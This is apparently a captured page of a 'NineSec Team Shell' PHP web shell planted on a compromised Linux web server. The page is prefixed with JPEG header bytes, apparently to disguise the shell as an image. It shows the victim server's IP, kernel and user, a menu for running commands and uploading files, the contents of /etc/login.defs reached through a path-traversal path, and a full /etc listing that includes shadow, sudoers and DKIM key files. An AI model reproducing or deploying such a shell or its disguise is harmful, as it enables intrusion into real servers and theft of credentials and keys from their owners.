�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /etc/jailkit/../firebird/../

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //etc/jailkit/../firebird/../login.defs
#
# /etc/login.defs - Configuration control definitions for the login package.
#
# Three items must be defined:  MAIL_DIR, ENV_SUPATH, and ENV_PATH.
# If unspecified, some arbitrary (and possibly incorrect) value will
# be assumed.  All other items are optional - if not specified then
# the described action or option will be inhibited.
#
# Comment lines (lines beginning with "#") and blank lines are ignored.
#
# Modified for Linux.  --marekm

# REQUIRED for useradd/userdel/usermod
#   Directory where mailboxes reside, _or_ name of file, relative to the
#   home directory.  If you _do_ define MAIL_DIR and MAIL_FILE,
#   MAIL_DIR takes precedence.
#
#   Essentially:
#      - MAIL_DIR defines the location of users mail spool files
#        (for mbox use) by appending the username to MAIL_DIR as defined
#        below.
#      - MAIL_FILE defines the location of the users mail spool files as the
#        fully-qualified filename obtained by prepending the user home
#        directory before $MAIL_FILE
#
# NOTE: This is no more used for setting up users MAIL environment variable
#       which is, starting from shadow 4.0.12-1 in Debian, entirely the
#       job of the pam_mail PAM modules
#       See default PAM configuration files provided for
#       login, su, etc.
#
# This is a temporary situation: setting these variables will soon
# move to /etc/default/useradd and the variables will then be
# no more supported
MAIL_DIR        /var/mail
#MAIL_FILE      .mail

#
# Enable logging and display of /var/log/faillog login failure info.
# This option conflicts with the pam_tally PAM module.
#
FAILLOG_ENAB		yes

#
# Enable display of unknown usernames when login failures are recorded.
#
# WARNING: Unknown usernames may become world readable. 
# See #290803 and #298773 for details about how this could become a security
# concern
LOG_UNKFAIL_ENAB	no

#
# Enable logging of successful logins
#
LOG_OK_LOGINS		no

#
# Enable "syslog" logging of su activity - in addition to sulog file logging.
# SYSLOG_SG_ENAB does the same for newgrp and sg.
#
SYSLOG_SU_ENAB		yes
SYSLOG_SG_ENAB		yes

#
# If defined, all su activity is logged to this file.
#
#SULOG_FILE	/var/log/sulog

#
# If defined, file which maps tty line to TERM environment parameter.
# Each line of the file is in a format something like "vt100  tty01".
#
#TTYTYPE_FILE	/etc/ttytype

#
# If defined, login failures will be logged here in a utmp format
# last, when invoked as lastb, will read /var/log/btmp, so...
#
FTMP_FILE	/var/log/btmp

#
# If defined, the command name to display when running "su -".  For
# example, if this is defined as "su" then a "ps" will display the
# command is "-su".  If not defined, then "ps" would display the
# name of the shell actually being run, e.g. something like "-sh".
#
SU_NAME		su

#
# If defined, file which inhibits all the usual chatter during the login
# sequence.  If a full pathname, then hushed mode will be enabled if the
# user's name or shell are found in the file.  If not a full pathname, then
# hushed mode will be enabled if the file exists in the user's home directory.
#
HUSHLOGIN_FILE	.hushlogin
#HUSHLOGIN_FILE	/etc/hushlogins

#
# *REQUIRED*  The default PATH settings, for superuser and normal users.
#
# (they are minimal, add the rest in the shell startup files)
ENV_SUPATH	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ENV_PATH	PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

#
# Terminal permissions
#
#	TTYGROUP	Login tty will be assigned this group ownership.
#	TTYPERM		Login tty will be set to this permission.
#
# If you have a "write" program which is "setgid" to a special group
# which owns the terminals, define TTYGROUP to the group number and
# TTYPERM to 0620.  Otherwise leave TTYGROUP commented out and assign
# TTYPERM to either 622 or 600.
#
# In Debian /usr/bin/bsd-write or similar programs are setgid tty
# However, the default and recommended value for TTYPERM is still 0600
# to not allow anyone to write to anyone else console or terminal

# Users can still allow other people to write them by issuing 
# the "mesg y" command.

TTYGROUP	tty
TTYPERM		0600

#
# Login configuration initializations:
#
#	ERASECHAR	Terminal ERASE character ('\010' = backspace).
#	KILLCHAR	Terminal KILL character ('\025' = CTRL/U).
#	UMASK		Default "umask" value.
#
# The ERASECHAR and KILLCHAR are used only on System V machines.
# 
# UMASK is the default umask value for pam_umask and is used by
# useradd and newusers to set the mode of the new home directories.
# 022 is the "historical" value in Debian for UMASK
# 027, or even 077, could be considered better for privacy
# There is no One True Answer here : each sysadmin must make up his/her
# mind.
#
# If USERGROUPS_ENAB is set to "yes", that will modify this UMASK default value
# for private user groups, i. e. the uid is the same as gid, and username is
# the same as the primary group name: for these, the user permissions will be
# used as group permissions, e. g. 022 will become 002.
#
# Prefix these values with "0" to get octal, "0x" to get hexadecimal.
#
ERASECHAR	0177
KILLCHAR	025
UMASK		022

#
# Password aging controls:
#
#	PASS_MAX_DAYS	Maximum number of days a password may be used.
#	PASS_MIN_DAYS	Minimum number of days allowed between password changes.
#	PASS_WARN_AGE	Number of days warning given before a password expires.
#
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7

#
# Min/max values for automatic uid selection in useradd
#
UID_MIN			 1000
UID_MAX			60000
# System accounts
#SYS_UID_MIN		  100
#SYS_UID_MAX		  999

#
# Min/max values for automatic gid selection in groupadd
#
GID_MIN			 1000
GID_MAX			60000
# System accounts
#SYS_GID_MIN		  100
#SYS_GID_MAX		  999

#
# Max number of login retries if password is bad. This will most likely be
# overriden by PAM, since the default pam_unix module has it's own built
# in of 3 retries. However, this is a safe fallback in case you are using
# an authentication module that does not enforce PAM_MAXTRIES.
#
LOGIN_RETRIES		5

#
# Max time in seconds for login
#
LOGIN_TIMEOUT		60

#
# Which fields may be changed by regular users using chfn - use
# any combination of letters "frwh" (full name, room number, work
# phone, home phone).  If not defined, no changes are allowed.
# For backward compatibility, "yes" = "rwh" and "no" = "frwh".
# 
CHFN_RESTRICT		rwh

#
# Should login be allowed if we can't cd to the home directory?
# Default in no.
#
DEFAULT_HOME	yes

#
# If defined, this command is run when removing a user.
# It should remove any at/cron/print jobs etc. owned by
# the user to be removed (passed as the first argument).
#
#USERDEL_CMD	/usr/sbin/userdel_local

#
# Enable setting of the umask group bits to be the same as owner bits
# (examples: 022 -> 002, 077 -> 007) for non-root users, if the uid is
# the same as gid, and username is the same as the primary group name.
#
# If set to yes, userdel will remove the user's group if it contains no
# more members, and useradd will create by default a group with the name
# of the user.
#
USERGROUPS_ENAB yes

#
# Instead of the real user shell, the program specified by this parameter
# will be launched, although its visible name (argv[0]) will be the shell's.
# The program may do whatever it wants (logging, additional authentification,
# banner, ...) before running the actual shell.
#
# FAKE_SHELL /bin/fakeshell

#
# If defined, either full pathname of a file containing device names or
# a ":" delimited list of device names.  Root logins will be allowed only
# upon these devices.
#
# This variable is used by login and su.
#
#CONSOLE	/etc/consoles
#CONSOLE	console:tty01:tty02:tty03:tty04

#
# List of groups to add to the user's supplementary group set
# when logging in on the console (as determined by the CONSOLE
# setting).  Default is none.
#
# Use with caution - it is possible for users to gain permanent
# access to these groups, even when not logged in on the console.
# How to do it is left as an exercise for the reader...
#
# This variable is used by login and su.
#
#CONSOLE_GROUPS		floppy:audio:cdrom

#
# If set to "yes", new passwords will be encrypted using the MD5-based
# algorithm compatible with the one used by recent releases of FreeBSD.
# It supports passwords of unlimited length and longer salt strings.
# Set to "no" if you need to copy encrypted passwords to other systems
# which don't understand the new algorithm.  Default is "no".
#
# This variable is deprecated. You should use ENCRYPT_METHOD.
#
#MD5_CRYPT_ENAB	no

#
# If set to MD5 , MD5-based algorithm will be used for encrypting password
# If set to SHA256, SHA256-based algorithm will be used for encrypting password
# If set to SHA512, SHA512-based algorithm will be used for encrypting password
# If set to DES, DES-based algorithm will be used for encrypting password (default)
# Overrides the MD5_CRYPT_ENAB option
#
# Note: It is recommended to use a value consistent with
# the PAM modules configuration.
#
ENCRYPT_METHOD SHA512

#
# Only used if ENCRYPT_METHOD is set to SHA256 or SHA512.
#
# Define the number of SHA rounds.
# With a lot of rounds, it is more difficult to brute forcing the password.
# But note also that it more CPU resources will be needed to authenticate
# users.
#
# If not specified, the libc will choose the default number of rounds (5000).
# The values must be inside the 1000-999999999 range.
# If only one of the MIN or MAX values is set, then this value will be used.
# If MIN > MAX, the highest value will be used.
#
# SHA_CRYPT_MIN_ROUNDS 5000
# SHA_CRYPT_MAX_ROUNDS 5000

################# OBSOLETED BY PAM ##############
#						#
# These options are now handled by PAM. Please	#
# edit the appropriate file in /etc/pam.d/ to	#
# enable the equivelants of them.
#
###############

#MOTD_FILE
#DIALUPS_CHECK_ENAB
#LASTLOG_ENAB
#MAIL_CHECK_ENAB
#OBSCURE_CHECKS_ENAB
#PORTTIME_CHECKS_ENAB
#SU_WHEEL_ONLY
#CRACKLIB_DICTPATH
#PASS_CHANGE_TRIES
#PASS_ALWAYS_WARN
#ENVIRON_FILE
#NOLOGINS_FILE
#ISSUE_FILE
#PASS_MIN_LEN
#PASS_MAX_LEN
#ULIMIT
#ENV_HZ
#CHFN_AUTH
#CHSH_AUTH
#FAIL_DELAY

################# OBSOLETED #######################
#						  #
# These options are no more handled by shadow.    #
#                                                 #
# Shadow utilities will display a warning if they #
# still appear.                                   #
#                                                 #
###################################################

# CLOSE_SESSIONS
# LOGIN_STRING
# NO_PASSWORD_CONSOLE
# QMAIL_DIR




NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
May 29 2025 6:02:43
root
0755
.git
--
December 20 2025 6:08:02
root
0700
ImageMagick-6
--
October 23 2023 6:31:03
root
0755
ODBCDataSources
--
January 14 2019 9:05:00
root
0755
PackageKit
--
March 29 2022 11:10:18
root
0755
X11
--
April 25 2020 3:53:39
root
0755
alternatives
--
May 29 2025 6:02:43
root
0755
apache2
--
December 20 2025 2:54:52
root
0755
apparmor
--
April 25 2020 3:53:40
root
0755
apparmor.d
--
February 12 2024 9:11:41
root
0755
apport
--
April 04 2022 10:16:24
root
0755
apt
--
October 18 2023 12:15:49
root
0755
awstats
--
March 01 2023 6:50:58
root
0755
bash_completion.d
--
October 23 2023 6:33:23
root
0755
bind
--
August 09 2025 9:39:09
root
2755
binfmt.d
--
April 22 2020 11:04:26
root
0755
bitninja
--
February 12 2024 9:11:36
root
0700
ca-certificates
--
April 25 2020 3:52:59
root
0755
calendar
--
April 25 2020 3:53:41
root
0755
clamav
--
March 29 2022 11:07:00
root
0755
console-setup
--
March 29 2022 9:48:09
root
0755
cron.d
--
April 08 2025 12:08:09
root
0755
cron.daily
--
December 13 2023 9:46:19
root
0755
cron.hourly
--
March 13 2024 10:31:37
root
0755
cron.monthly
--
April 25 2020 3:53:06
root
0755
cron.weekly
--
April 25 2020 3:53:43
root
0755
cruft
--
March 29 2022 9:52:28
root
0755
dbus-1
--
April 25 2020 3:52:58
root
0755
dconf
--
March 29 2022 11:10:06
root
0755
default
--
April 08 2025 12:08:09
root
0755
depmod.d
--
February 14 2023 5:47:48
root
0755
dhcp
--
March 08 2023 9:55:05
root
0755
dictionaries-common
--
April 04 2022 10:18:06
root
0755
dkimkeys
--
April 04 2022 9:49:26
opendkim
0700
dovecot
--
December 20 2025 2:54:52
root
0755
dpkg
--
May 27 2022 8:37:32
root
0755
emacs
--
April 04 2022 10:16:16
root
0755
environment.d
--
April 04 2022 10:17:18
root
0755
etckeeper
--
March 29 2022 10:49:59
root
0755
fail2ban
--
September 28 2022 11:09:56
root
0755
firebird
--
October 23 2023 12:50:27
root
0755
firefox
--
February 12 2024 9:08:51
root
0755
firewalld
--
March 29 2022 9:55:12
root
0750
fonts
--
April 25 2020 3:53:42
root
0755
freetds
--
October 23 2023 12:50:55
root
0755
ghostscript
--
April 04 2022 10:16:32
root
0755
groff
--
April 25 2020 3:53:42
root
0755
gss
--
April 25 2020 3:53:04
root
0755
gtk-2.0
--
April 04 2022 10:17:20
root
0755
gtk-3.0
--
April 04 2022 10:18:04
root
0755
init
--
February 12 2024 9:11:41
root
0755
init.d
--
April 08 2025 12:08:09
root
0755
insserv.conf.d
--
February 12 2024 9:11:02
root
0755
iproute2
--
April 25 2020 3:53:07
root
0755
jailkit
--
March 29 2022 10:49:39
root
0755
kernel
--
April 25 2020 3:53:00
root
0755
ld.so.conf.d
--
December 13 2023 9:42:29
root
0755
ldap
--
February 12 2024 9:08:59
root
0755
letsencrypt
--
December 20 2025 7:42:17
root
0755
libnl-3
--
February 14 2023 5:47:31
root
0755
libpaper.d
--
June 26 2019 12:04:32
root
0755
lighttpd
--
March 29 2022 9:53:51
root
0755
logcheck
--
March 29 2022 9:53:21
root
0755
logrotate.d
--
June 30 2025 6:16:05
root
0755
lvm
--
October 23 2023 12:51:00
root
0755
lynx
--
October 23 2023 6:31:21
root
0755
mail
--
April 04 2022 9:49:25
root
0755
milter-greylist
--
March 29 2022 10:49:47
root
0755
modprobe.d
--
February 14 2023 5:47:48
root
0755
modules-load.d
--
February 12 2024 9:07:12
root
0755
monit
--
March 29 2022 9:51:21
root
0755
mysql
--
February 12 2024 9:11:41
root
0755
netplan
--
April 23 2020 3:22:07
root
0755
network
--
April 25 2020 3:53:02
root
0755
networkd-dispatcher
--
April 25 2020 3:52:52
root
0755
newt
--
April 25 2020 3:53:07
root
0755
opt
--
April 25 2020 3:52:39
root
0755
pam.d
--
February 12 2024 9:12:54
root
0755
perl
--
March 29 2022 9:49:55
root
0755
php
--
October 20 2023 8:50:35
root
0755
pm
--
March 29 2022 11:10:14
root
0755
polkit-1
--
March 29 2022 9:51:55
root
0755
postfix
--
December 20 2025 2:54:51
root
0755
postgrey
--
March 29 2022 9:54:58
root
0755
ppp
--
April 25 2020 3:53:02
root
0755
profile.d
--
February 12 2024 9:07:08
root
0755
proftpd
--
April 11 2023 2:25:48
root
0755
python2.7
--
April 08 2022 2:42:58
root
0755
python3
--
April 25 2020 3:53:17
root
0755
python3.8
--
December 13 2023 9:45:33
root
0755
rc0.d
--
April 08 2025 12:08:10
root
0755
rc1.d
--
April 08 2025 12:08:10
root
0755
rc2.d
--
April 08 2025 12:08:10
root
0755
rc3.d
--
April 08 2025 12:08:10
root
0755
rc4.d
--
April 08 2025 12:08:10
root
0755
rc5.d
--
April 08 2025 12:08:10
root
0755
rc6.d
--
April 08 2025 12:08:10
root
0755
rcS.d
--
October 23 2023 12:51:01
root
0755
resolvconf
--
April 25 2020 3:53:02
root
0755
rsyslog.d
--
February 12 2024 9:11:02
root
0755
security
--
February 12 2024 9:07:10
root
0755
selinux
--
April 25 2020 3:52:48
root
0755
sensors.d
--
February 14 2023 5:46:52
root
0755
skel
--
April 21 2022 8:08:33
root
0755
spamassassin
--
October 23 2023 6:33:07
root
0755
ssh
--
February 12 2024 9:11:53
root
0755
ssl
--
February 12 2024 9:11:08
root
0755
sudoers.d
--
October 23 2023 6:31:21
root
0755
sysctl.d
--
February 12 2024 9:07:12
root
0755
systemd
--
February 12 2024 9:12:51
root
0755
terminfo
--
October 23 2023 6:28:43
root
0755
tmpfiles.d
--
March 29 2022 10:06:35
root
0755
ubuntu-advantage
--
December 13 2023 9:44:51
root
0755
udev
--
February 12 2024 9:11:00
root
0755
ufw
--
October 23 2023 6:32:13
root
0755
update-manager
--
October 23 2023 6:32:49
root
0755
update-motd.d
--
February 12 2024 9:07:08
root
0755
usermin
--
December 20 2025 2:54:52
root
0755
vim
--
February 12 2024 9:11:25
root
0755
vulkan
--
April 25 2020 3:53:24
root
0755
webalizer
--
March 29 2022 10:51:55
root
0755
webmin
--
December 20 2025 6:55:11
root
0755
xdg
--
April 25 2020 3:53:05
root
0755
zabbix
--
January 26 2023 9:39:20
root
0755
.etckeeper
3.25 MB
December 20 2025 6:08:02
root
0700
.gitignore
0.91 KB
March 29 2022 10:50:01
root
0600
.pwd.lock
0 KB
April 25 2020 3:52:50
root
0600
adduser.conf
2.957 KB
April 25 2020 3:53:05
root
0644
aliases
0.419 KB
July 15 2024 9:58:28
root
0644
aliases.db
12 KB
July 15 2024 9:58:28
root
0644
appliance.info
0.346 KB
April 25 2020 3:53:58
root
0644
bash.bashrc
2.265 KB
February 25 2020 1:03:22
root
0644
bash_completion
0.044 KB
January 26 2020 4:42:18
root
0644
bindresvport.blacklist
0.358 KB
April 14 2020 9:26:04
root
0644
ca-certificates.conf
7.368 KB
October 23 2023 6:32:44
root
0644
ca-certificates.conf.dpkg-old
6.664 KB
December 06 2022 6:26:16
root
0644
crontab
1.16 KB
March 31 2025 11:08:42
root
0644
daemon.conf
0.138 KB
September 05 2019 12:47:28
root
0644
debconf.conf
2.899 KB
August 03 2019 12:51:13
root
0644
debian_version
0.013 KB
December 05 2019 3:39:21
root
0644
deluser.conf
0.59 KB
September 16 2018 12:14:19
root
0644
dkim-domains.txt
0.191 KB
December 18 2025 4:18:39
root
0755
dkim-keytable
0.03 KB
November 28 2023 11:07:04
root
0755
dkim-signingtable
0.01 KB
November 28 2023 11:07:04
root
0755
dkim.key
1.64 KB
April 04 2022 9:49:57
opendkim
0700
e2scrub.conf
0.669 KB
February 14 2020 7:08:18
root
0644
environment
0.104 KB
March 29 2022 11:08:17
root
0644
ethertypes
1.773 KB
December 27 2019 1:42:11
root
0644
fstab
0.036 KB
March 29 2022 10:51:51
root
0644
ftpusers
0.129 KB
February 27 2020 8:30:14
root
0644
fuse.conf
0.273 KB
June 20 2014 8:23:50
root
0644
gai.conf
2.523 KB
February 01 2020 12:52:50
root
0644
group
1.574 KB
July 28 2025 12:07:42
root
0644
group-
1.473 KB
March 03 2023 8:04:03
root
0644
gshadow
1.305 KB
July 28 2025 12:07:42
root
0640
gshadow-
1.223 KB
March 03 2023 8:04:03
root
0640
hdparm.conf
4.941 KB
August 21 2019 2:36:14
root
0644
host.conf
0.09 KB
December 05 2019 3:39:21
root
0644
hostname
0.004 KB
May 29 2025 6:02:42
root
0644
hosts
0.18 KB
May 29 2025 6:02:42
root
0644
hosts.allow
0.401 KB
April 25 2020 3:53:06
root
0644
hosts.deny
0.694 KB
April 25 2020 3:53:06
root
0644
inputrc
1.707 KB
February 25 2020 12:48:50
root
0644
issue
0.025 KB
March 14 2023 12:20:39
root
0644
issue.net
0.019 KB
March 14 2023 12:20:39
root
0644
ld.so.cache
49.019 KB
February 12 2024 9:12:54
root
0644
ld.so.conf
0.033 KB
April 14 2020 9:26:04
root
0644
legal
0.261 KB
December 05 2019 3:39:21
root
0644
libaudit.conf
0.187 KB
February 18 2020 10:42:38
root
0644
locale.alias
2.926 KB
April 14 2020 9:26:04
root
0644
locale.gen
9.217 KB
December 13 2023 9:44:41
root
0644
localtime
2.62 KB
January 02 2024 9:08:29
root
0644
login.defs
10.303 KB
February 07 2020 4:32:06
root
0644
logrotate.conf
0.625 KB
May 06 2025 12:14:47
root
0644
lsb-release
0.102 KB
March 14 2023 12:20:21
root
0644
ltrace.conf
14.519 KB
February 01 2019 1:10:30
root
0644
machine-id
0.032 KB
April 25 2020 3:53:20
root
0444
magic
0.108 KB
January 16 2020 9:39:11
root
0644
magic.mime
0.108 KB
January 16 2020 9:39:11
root
0644
mail.rc
0.122 KB
August 08 2018 11:12:01
root
0644
mailcap
4.797 KB
February 12 2024 9:12:54
root
0644
mailcap.order
0.438 KB
October 19 2019 1:05:50
root
0644
manpath.config
5.093 KB
February 25 2020 6:13:45
root
0644
mecabrc
0.281 KB
February 26 2020 6:10:50
root
0644
mime.types
23.971 KB
October 19 2019 1:05:50
root
0644
mke2fs.conf
0.789 KB
February 14 2020 7:08:18
root
0644
modules
0.19 KB
April 25 2020 3:53:08
root
0644
mtab
0 KB
December 20 2025 7:43:36
readytorun
0444
nanorc
9.802 KB
February 07 2020 12:27:28
root
0644
netconfig
0.749 KB
December 27 2019 3:11:57
root
0644
networks
0.089 KB
December 05 2019 3:39:21
root
0644
nsswitch.conf
0.489 KB
March 29 2022 10:51:47
root
0644
odbc.ini
0 KB
January 14 2019 9:05:00
root
0644
opendkim.conf
2.779 KB
December 18 2025 4:18:39
root
0644
os-release
0.373 KB
January 02 2024 6:12:43
root
0644
pam.conf
0.539 KB
December 17 2019 5:41:40
root
0644
papersize
0.003 KB
April 04 2022 10:16:51
root
0644
passwd
15.734 KB
December 18 2025 4:18:40
root
0644
passwd-
10.823 KB
March 03 2023 8:04:01
root
0644
popularity-contest.conf
0.342 KB
April 25 2020 3:53:39
root
0644
procmailrc
0.376 KB
February 12 2024 9:10:28
root
0644
profile
0.567 KB
December 05 2019 3:39:21
root
0644
protocols
2.863 KB
April 01 2013 11:29:14
root
0644
quotagrpadmins
0.215 KB
April 09 2019 10:12:04
root
0644
quotatab
0.514 KB
April 09 2019 10:11:01
root
0644
rc.local
0.18 KB
July 16 2025 10:34:56
root
0755
resolv.conf
0.156 KB
May 29 2025 6:02:42
root
0644
rmt
58.547 KB
December 05 2023 6:16:50
root
0755
rpc
0.866 KB
April 01 2013 6:41:40
root
0644
rsyslog.conf
1.35 KB
February 11 2020 4:22:43
root
0644
sasldb2
12 KB
March 29 2022 9:54:26
root
0660
screenrc
3.577 KB
June 20 2016 2:31:45
root
0644
sensors3.conf
10.345 KB
November 06 2019 9:56:11
root
0644
services
14.125 KB
February 17 2020 12:20:43
root
0644
shadow
22.327 KB
December 18 2025 4:18:40
root
0640
shadow-
14.534 KB
March 03 2023 8:04:02
root
0640
shells
0.098 KB
March 29 2022 10:51:53
root
0644
subgid
0 KB
April 25 2020 3:52:50
root
0644
subuid
0 KB
April 25 2020 3:52:50
root
0644
sudoers
0.737 KB
February 03 2020 3:32:18
root
0440
sysctl.conf
2.344 KB
December 04 2023 11:23:01
root
0644
timezone
0.012 KB
February 12 2024 9:10:59
root
0644
ucf.conf
1.23 KB
December 14 2018 9:51:14
root
0644
vdpau_wrapper.cfg
0.05 KB
August 28 2019 7:57:55
root
0644
virtualmin-license
0.031 KB
March 29 2022 10:45:45
root
0700
vtrgb
0.154 KB
March 27 2020 11:10:06
root
0644
warnquota.conf
0.307 KB
April 09 2019 10:11:01
root
0644
wgetrc
4.826 KB
July 24 2019 9:40:25
root
0644
xattr.conf
0.627 KB
September 24 2019 4:17:57
root
0644
zsh_command_not_found
0.466 KB
October 07 2019 5:08:21
root
0644

NineSec Team - 2022